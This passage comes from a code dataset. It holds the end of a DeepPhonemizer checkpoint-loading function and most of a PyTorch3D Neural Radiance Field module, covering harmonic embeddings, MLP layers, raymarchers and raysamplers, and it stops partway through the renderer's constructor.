Dict[str, Any]]:\n \"\"\"\n Initializes a model from a checkpoint (.pt file).\n\n Args:\n checkpoint_path (str): Path to checkpoint file (.pt).\n device (str): Device to put the model to ('cpu' or 'cuda').\n\n Returns: Tuple: The first element is a Model (the loaded model)\n and the second element is a dictionary (config).\n \"\"\"\n\n device = torch.device(device)\n checkpoint = torch.load(checkpoint_path, map_location=device)\n model_type = checkpoint['config']['model']['type']\n model_type = ModelType(model_type)\n model = create_model(model_type, config=checkpoint['config'])\n model.load_state_dict(checkpoint['model'])\n model.eval()\n return model, checkpoint","repo_name":"as-ideas/DeepPhonemizer","sub_path":"dp/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11771,"program_lang":"python","lang":"en","doc_type":"code","stars":290,"dataset":"github-code","pt":"21"} +{"seq_id":"16296066121","text":"import math\nfrom typing import Tuple, List\n\nimport torch\nimport torch.nn.functional as F\nfrom pytorch3d.renderer import RayBundle, ray_bundle_to_ray_points, MonteCarloRaysampler, NDCGridRaysampler, RayBundle, EmissionAbsorptionRaymarcher\nfrom pytorch3d.renderer.cameras import CamerasBase\nfrom pytorch3d.renderer.implicit.sample_pdf import sample_pdf\nfrom pytorch3d.renderer.implicit.raymarching import (\n _check_density_bounds,\n _check_raymarcher_inputs,\n _shifted_cumprod,\n)\nfrom .utils import calc_mse, calc_psnr, sample_images_at_mc_locs\n\n\nclass LinearWithRepeat(torch.nn.Linear):\n \"\"\"\n if x has shape (..., k, n1)\n and y has shape (..., n2)\n then\n LinearWithRepeat(n1 + n2, out_features).forward((x,y))\n is equivalent to\n Linear(n1 + n2, out_features).forward(\n torch.cat([x, y.unsqueeze(-2).expand(..., k, n2)], dim=-1)\n )\n\n Or visually:\n Given the following, for each ray,\n\n feature ->\n\n ray xxxxxxxx\n position xxxxxxxx\n | xxxxxxxx\n v xxxxxxxx\n\n\n and\n yyyyyyyy\n\n where the y's do not depend on the position\n but only on the ray,\n we want to evaluate a Linear layer on both\n types of data at every position.\n\n It's as if we constructed\n\n xxxxxxxxyyyyyyyy\n xxxxxxxxyyyyyyyy\n xxxxxxxxyyyyyyyy\n xxxxxxxxyyyyyyyy\n\n and sent that through the Linear.\n \"\"\"\n\n def forward(self, input: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:\n n1 = input[0].shape[-1]\n output1 = F.linear(input[0], self.weight[:, :n1], self.bias)\n output2 = F.linear(input[1], self.weight[:, n1:], None)\n return output1 + output2.unsqueeze(-2)\n\n\nclass HarmonicEmbedding(torch.nn.Module):\n def __init__(\n self,\n n_harmonic_functions: int = 6,\n omega0: float = 1.0,\n logspace: bool = True,\n include_input: bool = True,\n ) -> None:\n \"\"\"\n Given an input tensor `x` of shape [minibatch, ... , dim],\n the harmonic embedding layer converts each feature\n in `x` into a series of harmonic features `embedding`,\n where for each i in range(dim) the following are present\n in embedding[...]:\n ```\n [\n sin(x[..., i]),\n sin(f_1*x[..., i]),\n sin(f_2*x[..., i]),\n ...\n sin(f_N * x[..., i]),\n cos(x[..., i]),\n cos(f_1*x[..., i]),\n cos(f_2*x[..., i]),\n ...\n cos(f_N * x[..., i]),\n x[..., i] # only present if include_input is True.\n ]\n ```\n where N corresponds to `n_harmonic_functions`, and f_i is a scalar\n denoting the i-th frequency of the harmonic embedding.\n The shape of the output is [minibatch, ... , dim * (2 * N + 1)] if\n include_input is True, otherwise [minibatch, ... , dim * (2 * N)].\n\n If `logspace==True`, the frequencies `[f_1, ..., f_N]` are\n powers of 2:\n `f_1 = 1, ..., f_N = 2**torch.arange(n_harmonic_functions)`\n\n If `logspace==False`, frequencies are linearly spaced between\n `1.0` and `2**(n_harmonic_functions-1)`:\n `f_1, ..., f_N = torch.linspace(\n 1.0, 2**(n_harmonic_functions-1), n_harmonic_functions\n )`\n\n Note that `x` is also premultiplied by the base frequency `omega0`\n before evaluating the harmonic functions.\n \"\"\"\n super().__init__()\n\n if logspace:\n frequencies = 2.0 ** torch.arange(\n n_harmonic_functions,\n dtype=torch.float32,\n )\n else:\n frequencies = torch.linspace(\n 1.0,\n 2.0 ** (n_harmonic_functions - 1),\n n_harmonic_functions,\n dtype=torch.float32,\n )\n\n try:\n self.register_buffer(\"_frequencies\", omega0 * frequencies, persistent=False)\n except TypeError:\n # workaround for pytorch<1.6\n self.register_buffer(\"_frequencies\", omega0 * frequencies)\n\n self.include_input = include_input\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Args:\n x: tensor of shape [..., dim]\n Returns:\n embedding: a harmonic embedding of `x` of shape\n [..., dim * (n_harmonic_functions * 2 + T)] where\n T is 1 if include_input is True and 0 otherwise.\n \"\"\"\n embed = (x[..., None] * self._frequencies).view(*x.shape[:-1], -1)\n if self.include_input:\n return torch.cat((embed.sin(), embed.cos(), x), dim=-1)\n else:\n return torch.cat((embed.sin(), embed.cos()), dim=-1)\n\n\ndef _xavier_init(linear):\n \"\"\"\n Performs the Xavier weight initialization of the linear layer `linear`.\n \"\"\"\n torch.nn.init.xavier_uniform_(linear.weight.data)\n\n\nclass NeuralRadianceField(torch.nn.Module):\n def __init__(\n self,\n n_harmonic_functions_xyz: int = 6,\n n_harmonic_functions_dir: int = 4,\n n_hidden_neurons_xyz: int = 256,\n n_hidden_neurons_dir: int = 128,\n n_layers_xyz: int = 8,\n append_xyz: Tuple[int] = (5,),\n use_multiple_streams: bool = True,\n **kwargs,\n ):\n \"\"\"\n Args:\n n_harmonic_functions_xyz: The number of harmonic functions\n used to form the harmonic embedding of 3D point locations.\n n_harmonic_functions_dir: The number of harmonic functions\n used to form the harmonic embedding of the ray directions.\n n_hidden_neurons_xyz: The number of hidden units in the\n fully connected layers of the MLP that accepts the 3D point\n locations and outputs the occupancy field with the intermediate\n features.\n n_hidden_neurons_dir: The number of hidden units in the\n fully connected layers of the MLP that accepts the intermediate\n features and ray directions and outputs the radiance field\n (per-point colors).\n n_layers_xyz: The number of layers of the MLP that outputs the\n occupancy field.\n append_xyz: The list of indices of the skip layers of the occupancy MLP.\n use_multiple_streams: Whether density and color should be calculated on\n separate CUDA streams.\n \"\"\"\n super().__init__()\n\n # The harmonic embedding layer converts input 3D coordinates\n # to a representation that is more suitable for\n # processing with a deep neural network.\n self.harmonic_embedding_xyz = HarmonicEmbedding(n_harmonic_functions_xyz)\n self.harmonic_embedding_dir = HarmonicEmbedding(n_harmonic_functions_dir)\n embedding_dim_xyz = n_harmonic_functions_xyz * 2 * 3 + 3\n embedding_dim_dir = n_harmonic_functions_dir * 2 * 3 + 3\n\n self.mlp_xyz = MLPWithInputSkips(\n n_layers_xyz,\n embedding_dim_xyz,\n n_hidden_neurons_xyz,\n embedding_dim_xyz,\n n_hidden_neurons_xyz,\n input_skips=append_xyz,\n )\n\n self.intermediate_linear = torch.nn.Linear(\n n_hidden_neurons_xyz, n_hidden_neurons_xyz\n )\n _xavier_init(self.intermediate_linear)\n\n self.density_layer = torch.nn.Linear(n_hidden_neurons_xyz, 1)\n _xavier_init(self.density_layer)\n\n # Zero the bias of the density layer to avoid\n # a completely transparent initialization.\n self.density_layer.bias.data[:] = 0.0 # fixme: Sometimes this is not enough\n\n self.color_layer = torch.nn.Sequential(\n LinearWithRepeat(\n n_hidden_neurons_xyz + embedding_dim_dir, n_hidden_neurons_dir\n ),\n torch.nn.ReLU(True),\n torch.nn.Linear(n_hidden_neurons_dir, 3),\n torch.nn.Sigmoid(),\n )\n self.use_multiple_streams = use_multiple_streams\n\n def _get_densities(\n self,\n features: torch.Tensor,\n depth_values: torch.Tensor,\n density_noise_std: float,\n ) -> torch.Tensor:\n \"\"\"\n This function takes `features` predicted by `self.mlp_xyz`\n and converts them to `raw_densities` with `self.density_layer`.\n `raw_densities` are later re-weighted using the depth step sizes\n and mapped to [0-1] range with 1 - inverse exponential of `raw_densities`.\n \"\"\"\n raw_densities = self.density_layer(features)\n deltas = torch.cat(\n (\n depth_values[..., 1:] - depth_values[..., :-1],\n 1e10 * torch.ones_like(depth_values[..., :1]),\n ),\n dim=-1,\n )[..., None]\n if density_noise_std > 0.0:\n raw_densities = (\n raw_densities + torch.randn_like(raw_densities) * density_noise_std\n )\n densities = 1 - (-deltas * torch.relu(raw_densities)).exp()\n return densities\n\n def _get_colors(\n self, features: torch.Tensor, rays_directions: torch.Tensor\n ) -> torch.Tensor:\n \"\"\"\n This function takes per-point `features` predicted by `self.mlp_xyz`\n and evaluates the color model in order to attach to each\n point a 3D vector of its RGB color.\n \"\"\"\n # Normalize the ray_directions to unit l2 norm.\n rays_directions_normed = torch.nn.functional.normalize(rays_directions, dim=-1)\n\n # Obtain the harmonic embedding of the normalized ray directions.\n rays_embedding = self.harmonic_embedding_dir(rays_directions_normed)\n\n return self.color_layer((self.intermediate_linear(features), rays_embedding))\n\n def _get_densities_and_colors(\n self, features: torch.Tensor, ray_bundle: RayBundle, density_noise_std: float\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n The second part of the forward calculation.\n\n Args:\n features: the output of the common mlp (the prior part of the\n calculation), shape\n (minibatch x ... x self.n_hidden_neurons_xyz).\n ray_bundle: As for forward().\n density_noise_std: As for forward().\n\n Returns:\n rays_densities: A tensor of shape `(minibatch, ..., num_points_per_ray, 1)`\n denoting the opacity of each ray point.\n rays_colors: A tensor of shape `(minibatch, ..., num_points_per_ray, 3)`\n denoting the color of each ray point.\n \"\"\"\n if self.use_multiple_streams and features.is_cuda:\n current_stream = torch.cuda.current_stream(features.device)\n other_stream = torch.cuda.Stream(features.device)\n other_stream.wait_stream(current_stream)\n\n with torch.cuda.stream(other_stream):\n rays_densities = self._get_densities(\n features, ray_bundle.lengths, density_noise_std\n )\n # rays_densities.shape = [minibatch x ... x 1] in [0-1]\n\n rays_colors = self._get_colors(features, ray_bundle.directions)\n # rays_colors.shape = [minibatch x ... x 3] in [0-1]\n\n current_stream.wait_stream(other_stream)\n else:\n # Same calculation as above, just serial.\n rays_densities = self._get_densities(\n features, ray_bundle.lengths, density_noise_std\n )\n rays_colors = self._get_colors(features, ray_bundle.directions)\n return rays_densities, rays_colors\n\n def forward(\n self,\n ray_bundle: RayBundle,\n density_noise_std: float = 0.0,\n **kwargs,\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n The forward function accepts the parametrizations of\n 3D points sampled along projection rays. The forward\n pass is responsible for attaching a 3D vector\n and a 1D scalar representing the point's\n RGB color and opacity respectively.\n\n Args:\n ray_bundle: A RayBundle object containing the following variables:\n origins: A tensor of shape `(minibatch, ..., 3)` denoting the\n origins of the sampling rays in world coords.\n directions: A tensor of shape `(minibatch, ..., 3)`\n containing the direction vectors of sampling rays in world coords.\n lengths: A tensor of shape `(minibatch, ..., num_points_per_ray)`\n containing the lengths at which the rays are sampled.\n density_noise_std: A floating point value representing the\n variance of the random normal noise added to the output of\n the opacity function. This can prevent floating artifacts.\n\n Returns:\n rays_densities: A tensor of shape `(minibatch, ..., num_points_per_ray, 1)`\n denoting the opacity of each ray point.\n rays_colors: A tensor of shape `(minibatch, ..., num_points_per_ray, 3)`\n denoting the color of each ray point.\n \"\"\"\n # We first convert the ray parametrizations to world\n # coordinates with `ray_bundle_to_ray_points`.\n rays_points_world = ray_bundle_to_ray_points(ray_bundle)\n # rays_points_world.shape = [minibatch x ... x 3]\n\n # For each 3D world coordinate, we obtain its harmonic embedding.\n embeds_xyz = self.harmonic_embedding_xyz(rays_points_world)\n # embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions*6 + 3]\n\n # self.mlp maps each harmonic embedding to a latent feature space.\n features = self.mlp_xyz(embeds_xyz, embeds_xyz)\n # features.shape = [minibatch x ... x self.n_hidden_neurons_xyz]\n\n rays_densities, rays_colors = self._get_densities_and_colors(\n features, ray_bundle, density_noise_std\n )\n return rays_densities, rays_colors\n\n\nclass MLPWithInputSkips(torch.nn.Module):\n \"\"\"\n Implements the multi-layer perceptron architecture of the Neural Radiance Field.\n\n As such, `MLPWithInputSkips` is a multi layer perceptron consisting\n of a sequence of linear layers with ReLU activations.\n\n Additionally, for a set of predefined layers `input_skips`, the forward pass\n appends a skip tensor `z` to the output of the preceding layer.\n\n Note that this follows the architecture described in the Supplementary\n Material (Fig. 7) of [1].\n\n References:\n [1] Ben Mildenhall and Pratul P. Srinivasan and Matthew Tancik\n and Jonathan T. Barron and Ravi Ramamoorthi and Ren Ng:\n NeRF: Representing Scenes as Neural Radiance Fields for View\n Synthesis, ECCV2020\n \"\"\"\n\n def __init__(\n self,\n n_layers: int,\n input_dim: int,\n output_dim: int,\n skip_dim: int,\n hidden_dim: int,\n input_skips: Tuple[int] = (),\n ):\n \"\"\"\n Args:\n n_layers: The number of linear layers of the MLP.\n input_dim: The number of channels of the input tensor.\n output_dim: The number of channels of the output.\n skip_dim: The number of channels of the tensor `z` appended when\n evaluating the skip layers.\n hidden_dim: The number of hidden units of the MLP.\n input_skips: The list of layer indices at which we append the skip\n tensor `z`.\n \"\"\"\n super().__init__()\n layers = []\n for layeri in range(n_layers):\n if layeri == 0:\n dimin = input_dim\n dimout = hidden_dim\n elif layeri in input_skips:\n dimin = hidden_dim + skip_dim\n dimout = hidden_dim\n else:\n dimin = hidden_dim\n dimout = hidden_dim\n linear = torch.nn.Linear(dimin, dimout)\n _xavier_init(linear)\n layers.append(torch.nn.Sequential(linear, torch.nn.ReLU(True)))\n self.mlp = torch.nn.ModuleList(layers)\n self._input_skips = set(input_skips)\n\n def forward(self, x: torch.Tensor, z: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Args:\n x: The input tensor of shape `(..., input_dim)`.\n z: The input skip tensor of shape `(..., skip_dim)` which is appended\n to layers whose indices are specified by `input_skips`.\n Returns:\n y: The output tensor of shape `(..., output_dim)`.\n \"\"\"\n y = x\n for li, layer in enumerate(self.mlp):\n if li in self._input_skips:\n y = torch.cat((y, z), dim=-1)\n y = layer(y)\n return y\n\n\nclass EmissionAbsorptionNeRFRaymarcher(EmissionAbsorptionRaymarcher):\n \"\"\"\n This is essentially the `pytorch3d.renderer.EmissionAbsorptionRaymarcher`\n which additionally returns the rendering weights. It also skips returning\n the computation of the alpha-mask which is, in case of NeRF, equal to 1\n everywhere.\n\n The weights are later used in the NeRF pipeline to carry out the importance\n ray-sampling for the fine rendering pass.\n\n For more details about the EmissionAbsorptionRaymarcher please refer to\n the documentation of `pytorch3d.renderer.EmissionAbsorptionRaymarcher`.\n \"\"\"\n\n def forward(\n self,\n rays_densities: torch.Tensor,\n rays_features: torch.Tensor,\n eps: float = 1e-10,\n **kwargs,\n ) -> torch.Tensor:\n \"\"\"\n Args:\n rays_densities: Per-ray density values represented with a tensor\n of shape `(..., n_points_per_ray, 1)` whose values range in [0, 1].\n rays_features: Per-ray feature values represented with a tensor\n of shape `(..., n_points_per_ray, feature_dim)`.\n eps: A lower bound added to `rays_densities` before computing\n the absorption function (cumprod of `1-rays_densities` along\n each ray). This prevents the cumprod to yield exact 0\n which would inhibit any gradient-based learning.\n\n Returns:\n features: A tensor of shape `(..., feature_dim)` containing\n the rendered features for each ray.\n weights: A tensor of shape `(..., n_points_per_ray)` containing\n the ray-specific emission-absorption distribution.\n Each ray distribution `(..., :)` is a valid probability\n distribution, i.e. it contains non-negative values that integrate\n to 1, such that `weights.sum(dim=-1)==1).all()` yields `True`.\n \"\"\"\n _check_raymarcher_inputs(\n rays_densities,\n rays_features,\n None,\n z_can_be_none=True,\n features_can_be_none=False,\n density_1d=True,\n )\n _check_density_bounds(rays_densities)\n rays_densities = rays_densities[..., 0]\n absorption = _shifted_cumprod(\n (1.0 + eps) - rays_densities, shift=self.surface_thickness\n )\n weights = rays_densities * absorption\n features = (weights[..., None] * rays_features).sum(dim=-2)\n\n return features, weights\n\n\nclass ProbabilisticRaysampler(torch.nn.Module):\n \"\"\"\n Implements the importance sampling of points along rays.\n The input is a `RayBundle` object with a `ray_weights` tensor\n which specifies the probabilities of sampling a point along each ray.\n\n This raysampler is used for the fine rendering pass of NeRF.\n As such, the forward pass accepts the RayBundle output by the\n raysampling of the coarse rendering pass. Hence, it does not\n take cameras as input.\n \"\"\"\n\n def __init__(\n self,\n n_pts_per_ray: int,\n stratified: bool,\n stratified_test: bool,\n add_input_samples: bool = True,\n ):\n \"\"\"\n Args:\n n_pts_per_ray: The number of points to sample along each ray.\n stratified: If `True`, the input `ray_weights` are assumed to be\n sampled at equidistant intervals.\n stratified_test: Same as `stratified` with the difference that this\n setting is applied when the module is in the `eval` mode\n (`self.training==False`).\n add_input_samples: Concatenates and returns the sampled values\n together with the input samples.\n \"\"\"\n super().__init__()\n self._n_pts_per_ray = n_pts_per_ray\n self._stratified = stratified\n self._stratified_test = stratified_test\n self._add_input_samples = add_input_samples\n\n def forward(\n self,\n input_ray_bundle: RayBundle,\n ray_weights: torch.Tensor,\n **kwargs,\n ) -> RayBundle:\n \"\"\"\n Args:\n input_ray_bundle: An instance of `RayBundle` specifying the\n source rays for sampling of the probability distribution.\n ray_weights: A tensor of shape\n `(..., input_ray_bundle.legths.shape[-1])` with non-negative\n elements defining the probability distribution to sample\n ray points from.\n\n Returns:\n ray_bundle: A new `RayBundle` instance containing the input ray\n points together with `n_pts_per_ray` additional sampled\n points per ray.\n \"\"\"\n\n # Calculate the mid-points between the ray depths.\n z_vals = input_ray_bundle.lengths\n batch_size = z_vals.shape[0]\n\n # Carry out the importance sampling.\n with torch.no_grad():\n z_vals_mid = 0.5 * (z_vals[..., 1:] + z_vals[..., :-1])\n z_samples = sample_pdf(\n z_vals_mid.view(-1, z_vals_mid.shape[-1]),\n ray_weights.view(-1, ray_weights.shape[-1])[..., 1:-1],\n self._n_pts_per_ray,\n det=not (\n (self._stratified and self.training)\n or (self._stratified_test and not self.training)\n ),\n ).view(batch_size, z_vals.shape[1], self._n_pts_per_ray)\n\n if self._add_input_samples:\n # Add the new samples to the input ones.\n z_vals = torch.cat((z_vals, z_samples), dim=-1)\n else:\n z_vals = z_samples\n # Resort by depth.\n z_vals, _ = torch.sort(z_vals, dim=-1)\n\n return RayBundle(\n origins=input_ray_bundle.origins,\n directions=input_ray_bundle.directions,\n lengths=z_vals,\n xys=input_ray_bundle.xys,\n )\n\n\nclass NeRFRaysampler(torch.nn.Module):\n \"\"\"\n Implements the raysampler of NeRF.\n\n Depending on the `self.training` flag, the raysampler either samples\n a chunk of random rays (`self.training==True`), or returns a subset of rays\n of the full image grid (`self.training==False`).\n The chunking of rays allows for efficient evaluation of the NeRF implicit\n surface function without encountering out-of-GPU-memory errors.\n\n Additionally, this raysampler supports pre-caching of the ray bundles\n for a set of input cameras (`self.precache_rays`).\n Pre-caching the rays before training greatly speeds-up the ensuing\n raysampling step of the training NeRF iterations.\n \"\"\"\n\n def __init__(\n self,\n n_pts_per_ray: int,\n min_depth: float,\n max_depth: float,\n n_rays_per_image: int,\n image_width: int,\n image_height: int,\n stratified: bool = False,\n stratified_test: bool = False,\n ):\n \"\"\"\n Args:\n n_pts_per_ray: The number of points sampled along each ray.\n min_depth: The minimum depth of a ray-point.\n max_depth: The maximum depth of a ray-point.\n n_rays_per_image: Number of Monte Carlo ray samples when training\n (`self.training==True`).\n image_width: The horizontal size of the image grid.\n image_height: The vertical size of the image grid.\n stratified: If `True`, stratifies (=randomly offsets) the depths\n of each ray point during training (`self.training==True`).\n stratified_test: If `True`, stratifies (=randomly offsets) the depths\n of each ray point during evaluation (`self.training==False`).\n \"\"\"\n\n super().__init__()\n self._stratified = stratified\n self._stratified_test = stratified_test\n\n # Initialize the grid ray sampler.\n self._grid_raysampler = NDCGridRaysampler(\n image_width=image_width,\n image_height=image_height,\n n_pts_per_ray=n_pts_per_ray,\n min_depth=min_depth,\n max_depth=max_depth,\n )\n\n # Initialize the Monte Carlo ray sampler.\n self._mc_raysampler = MonteCarloRaysampler(\n min_x=-1.0,\n max_x=1.0,\n min_y=-1.0,\n max_y=1.0,\n n_rays_per_image=n_rays_per_image,\n n_pts_per_ray=n_pts_per_ray,\n min_depth=min_depth,\n max_depth=max_depth,\n )\n\n # create empty ray cache\n self._ray_cache = {}\n\n def get_n_chunks(self, chunksize: int, batch_size: int):\n \"\"\"\n Returns the total number of `chunksize`-sized chunks\n of the raysampler's rays.\n\n Args:\n chunksize: The number of rays per chunk.\n batch_size: The size of the batch of the raysampler.\n\n Returns:\n n_chunks: The total number of chunks.\n \"\"\"\n return int(\n math.ceil(\n (self._grid_raysampler._xy_grid.numel() * 0.5 * batch_size) / chunksize\n )\n )\n\n def _print_precaching_progress(self, i, total, bar_len=30):\n \"\"\"\n Print a progress bar for ray precaching.\n \"\"\"\n position = round((i + 1) / total * bar_len)\n pbar = \"[\" + \"█\" * position + \" \" * (bar_len - position) + \"]\"\n print(pbar, end=\"\\r\")\n\n def precache_rays(self, cameras: List[CamerasBase], camera_hashes: List):\n \"\"\"\n Precaches the rays emitted from the list of cameras `cameras`,\n where each camera is uniquely identified with the corresponding hash\n from `camera_hashes`.\n\n The cached rays are moved to cpu and stored in `self._ray_cache`.\n Raises `ValueError` when caching two cameras with the same hash.\n\n Args:\n cameras: A list of `N` cameras for which the rays are pre-cached.\n camera_hashes: A list of `N` unique identifiers of each\n camera from `cameras`.\n \"\"\"\n print(f\"Precaching {len(cameras)} ray bundles ...\")\n full_chunksize = (\n self._grid_raysampler._xy_grid.numel()\n // 2\n * self._grid_raysampler._n_pts_per_ray\n )\n if self.get_n_chunks(full_chunksize, 1) != 1:\n raise ValueError(\"There has to be one chunk for precaching rays!\")\n for camera_i, (camera, camera_hash) in enumerate(zip(cameras, camera_hashes)):\n ray_bundle = self.forward(\n camera,\n caching=True,\n chunksize=full_chunksize,\n )\n if camera_hash in self._ray_cache:\n raise ValueError(\"There are redundant cameras!\")\n self._ray_cache[camera_hash] = RayBundle(\n *[v.to(\"cpu\").detach() for v in ray_bundle]\n )\n self._print_precaching_progress(camera_i, len(cameras))\n print(\"\")\n\n def _stratify_ray_bundle(self, ray_bundle: RayBundle):\n \"\"\"\n Stratifies the lengths of the input `ray_bundle`.\n\n More specifically, the stratification replaces each ray points' depth `z`\n with a sample from a uniform random distribution on\n `[z - delta_depth, z+delta_depth]`, where `delta_depth` is the difference\n of depths of the consecutive ray depth values.\n\n Args:\n `ray_bundle`: The input `RayBundle`.\n\n Returns:\n `stratified_ray_bundle`: `ray_bundle` whose `lengths` field is replaced\n with the stratified samples.\n \"\"\"\n z_vals = ray_bundle.lengths\n # Get intervals between samples.\n mids = 0.5 * (z_vals[..., 1:] + z_vals[..., :-1])\n upper = torch.cat((mids, z_vals[..., -1:]), dim=-1)\n lower = torch.cat((z_vals[..., :1], mids), dim=-1)\n # Stratified samples in those intervals.\n z_vals = lower + (upper - lower) * torch.rand_like(lower)\n return ray_bundle._replace(lengths=z_vals)\n\n def _normalize_raybundle(self, ray_bundle: RayBundle):\n \"\"\"\n Normalizes the ray directions of the input `RayBundle` to unit norm.\n \"\"\"\n ray_bundle = ray_bundle._replace(\n directions=torch.nn.functional.normalize(ray_bundle.directions, dim=-1)\n )\n return ray_bundle\n\n def forward(\n self,\n cameras: CamerasBase,\n chunksize: int = None,\n chunk_idx: int = 0,\n camera_hash: str = None,\n caching: bool = False,\n **kwargs,\n ) -> RayBundle:\n \"\"\"\n Args:\n cameras: A batch of `batch_size` cameras from which the rays are emitted.\n chunksize: The number of rays per chunk.\n Active only when `self.training==False`.\n chunk_idx: The index of the ray chunk. The number has to be in\n `[0, self.get_n_chunks(chunksize, batch_size)-1]`.\n Active only when `self.training==False`.\n camera_hash: A unique identifier of a pre-cached camera. If `None`,\n the cache is not searched and the rays are calculated from scratch.\n caching: If `True`, activates the caching mode that returns the `RayBundle`\n that should be stored into the cache.\n Returns:\n A named tuple `RayBundle` with the following fields:\n origins: A tensor of shape\n `(batch_size, n_rays_per_image, 3)`\n denoting the locations of ray origins in the world coordinates.\n directions: A tensor of shape\n `(batch_size, n_rays_per_image, 3)`\n denoting the directions of each ray in the world coordinates.\n lengths: A tensor of shape\n `(batch_size, n_rays_per_image, n_pts_per_ray)`\n containing the z-coordinate (=depth) of each ray in world units.\n xys: A tensor of shape\n `(batch_size, n_rays_per_image, 2)`\n containing the 2D image coordinates of each ray.\n \"\"\"\n\n batch_size = cameras.R.shape[0] # pyre-ignore\n device = cameras.device\n\n if (camera_hash is None) and (not caching) and self.training:\n # Sample random rays from scratch.\n ray_bundle = self._mc_raysampler(cameras)\n ray_bundle = self._normalize_raybundle(ray_bundle)\n else:\n if camera_hash is not None:\n # The case where we retrieve a camera from cache.\n if batch_size != 1:\n raise NotImplementedError(\n \"Ray caching works only for batches with a single camera!\"\n )\n full_ray_bundle = self._ray_cache[camera_hash]\n else:\n # We generate a full ray grid from scratch.\n full_ray_bundle = self._grid_raysampler(cameras)\n full_ray_bundle = self._normalize_raybundle(full_ray_bundle)\n\n n_pixels = full_ray_bundle.directions.shape[:-1].numel()\n\n if self.training:\n # During training we randomly subsample rays.\n sel_rays = torch.randperm(n_pixels, device=device)[\n : self._mc_raysampler._n_rays_per_image\n ]\n else:\n # In case we test, we take only the requested chunk.\n if chunksize is None:\n chunksize = n_pixels * batch_size\n start = chunk_idx * chunksize * batch_size\n end = min(start + chunksize, n_pixels)\n sel_rays = torch.arange(\n start,\n end,\n dtype=torch.long,\n device=full_ray_bundle.lengths.device,\n )\n\n # Take the \"sel_rays\" rays from the full ray bundle.\n ray_bundle = RayBundle(\n *[\n v.view(n_pixels, -1)[sel_rays]\n .view(batch_size, sel_rays.numel() // batch_size, -1)\n .to(device)\n for v in full_ray_bundle\n ]\n )\n\n if (\n (self._stratified and self.training)\n or (self._stratified_test and not self.training)\n ) and not caching: # Make sure not to stratify when caching!\n ray_bundle = self._stratify_ray_bundle(ray_bundle)\n\n return ray_bundle\n\n\nclass RadianceFieldRenderer(torch.nn.Module):\n \"\"\"\n Implements a renderer of a Neural Radiance Field.\n\n This class holds pointers to the fine and coarse renderer objects, which are\n instances of `pytorch3d.renderer.ImplicitRenderer`, and pointers to the\n neural networks representing the fine and coarse Neural Radiance Fields,\n which are instances of `NeuralRadianceField`.\n\n The rendering forward pass proceeds as follows:\n 1) For a given input camera, rendering rays are generated with the\n `NeRFRaysampler` object of `self._renderer['coarse']`.\n In the training mode (`self.training==True`), the rays are a set\n of `n_rays_per_image` random 2D locations of the image grid.\n In the evaluation mode (`self.training==False`), the rays correspond\n to the full image grid. The rays are further split to\n `chunk_size_test`-sized chunks to prevent out-of-memory errors.\n 2) For each ray point, the coarse `NeuralRadianceField` MLP is evaluated.\n The pointer to this MLP is stored in `self._implicit_function['coarse']`\n 3) The coarse radiance field is rendered with the\n `EmissionAbsorptionNeRFRaymarcher` object of `self._renderer['coarse']`.\n 4) The coarse raymarcher outputs a probability distribution that guides\n the importance raysampling of the fine rendering pass. The\n `ProbabilisticRaysampler` stored in `self._renderer['fine'].raysampler`\n implements the importance ray-sampling.\n 5) Similar to 2) the fine MLP in `self._implicit_function['fine']`\n labels the ray points with occupancies and colors.\n 6) self._renderer['fine'].raymarcher` generates the final fine render.\n 7) The fine and coarse renders are compared to the ground truth input image\n with PSNR and MSE metrics.\n \"\"\"\n\n def __init__(\n self,\n image_size: Tuple[int, int],\n n_pts_per_ray: int,\n n_pts_per_ray_fine: int,\n n_rays_per_image: int,\n min_depth: float,\n max_depth: float,\n stratified: bool,\n stratified_test: bool,\n chunk_size_test: int,\n n_harmonic_functions_xyz: int = 6,\n n_harmonic_functions_dir: int = 4,\n n_hidden_neurons_xyz: int = 256,\n n_hidden_neurons_dir: int = 128,\n n_layers_xyz: int = 8,\n append_xyz: Tuple[int] = (5,),\n density_noise_std: float = 0.0,\n visualization: bool = False,\n ):\n \"\"\"\n Args:\n image_size: The size of the rendered image (`[height, width]`).\n n_pts_per_ray: The number of points sampled along each ray for the\n coarse rendering pass.\n n_pts_per_ray_fine: The number of points sampled along each ray for the\n fine rendering pass.\n n_rays_per_image: Number of Monte Carlo ray samples when training\n (`self.training==True`).\n min_depth: The minimum depth of a sampled ray-point for the coarse rendering.\n max_depth: The maximum depth of a sampled ray-point for the coarse rendering.\n stratified: If `True`, stratifies (=randomly offsets) the depths\n of each ray point during training (`self.training==True`).\n stratified_test: If `True`, stratifies (=randomly offsets) the depths\n of each ray point during evaluation (`self.training==False`).\n chunk_size_test: The number of rays in each chunk of image rays.\n Active only when `self.training==True`.\n n_harmonic_functions_xyz: The number of harmonic functions\n used to form the harmonic embedding of 3D point locations.\n n_harmonic_functions_dir: The number of harmonic functions\n used to form the harmonic embedding of the ray directions.\n n_hidden_neurons_xyz: The number of hidden units in the\n fully connected layers of the MLP that accepts the 3D point\n locations and outputs the occupancy field with the intermediate\n features.\n n_hidden_neurons_dir: The number of hidden units in the\n fully connected layers of the MLP that accepts the intermediate\n features and ray directions and outputs the radiance field\n (per-point colors).\n n_layers_xyz: The number of layers of the MLP that outputs the\n occupancy field.\n append_xyz: The list of indices of the skip layers of the occupancy MLP.\n Prior to evaluating the skip layers, the tensor which was input to MLP\n is appended to the skip layer input.\n density_noise_std: The standard deviation of the random normal noise\n added to the output of the occupancy MLP.\n Active only when `self.training==True`.\n visualization: whether to store extra output for visualization.\n \"\"\"\n\n super().__init__()\n\n # The renderers and implicit functions are stored under the fine/coarse\n # keys in ModuleDict PyTorch modules.\n self._renderer = torch.nn.ModuleDict()\n self._implicit_function = torch.nn.ModuleDict()\n\n # Init the EA raymarcher used by both passes.\n raymarcher = EmissionAbsorptionNeRFRaymarcher()\n\n # Parse out image dimensions.\n image_height, image_width = image_size\n\n for render_pass in (\"coarse\", \"fine\"):\n if render_pass == \"coarse\":\n # Initialize the coarse raysampler.\n raysampler = NeRFRaysampler(\n n_pts_per_ray=n_pts_per_ray,\n min_depth=min_depth,\n 